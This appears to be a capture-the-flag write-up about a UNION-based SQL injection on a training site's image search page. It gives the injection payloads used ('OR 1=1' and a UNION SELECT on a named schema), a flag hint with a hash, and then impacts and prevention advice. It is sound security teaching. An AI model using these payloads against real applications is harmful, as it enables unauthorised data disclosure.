# PIGGYBACK SQL INJECTION 2

## Explanation

On the image search page, there's an input field.

- OR 1=1 allows us to get all table entries.
  - => This table is vulnerable to UNION/piggyback injections.

### 1. Getting DB information

We already have retrieved the whole database from *PIGGYBACK SQL INJECTION 1*

- SCHEMA: Member_images
- TABLE : list_images
- COLUMNS :
  - id
  - url
  - title
  - comment

- 1 UNION SELECT url, comment FROM Member_images.list_images 
  - Comment : `If you read this just use this md5 decode lowercase then sha256 to win this flag ! : 1928e8083cf461a51303633093573c46`

## Exploitation

**This vulnerability ranks number 1 in OWASP's top 10 Web Application Security Risk**

Different types of SQL injections allow the attacker to perform various things.
> - Data loss
> - Data corruption
> - Disclosure of information
> - Denial of access
> - Sometimes complete takeover of the system

## Prevention

> - Use an ORM
> - Escape characters (does not protect numeric fields)
> - Use Prepared statements => input won't be interpreted as SQL code anymore
> - Use LIMIT and other SQL controls within queries to prevent mass disclosure of records in case of SQL injection.

## Documentation

- [OWASP - TOP 10 - sql injection](https://owasp.org/www-project-top-ten/2017/A1_2017-Injection)
- [OWASP - sql injection](https://owasp.org/www-community/attacks/SQL_Injection)
- [portswigger - UNION attacks](https://portswigger.net/web-security/sql-injection/union-attacks)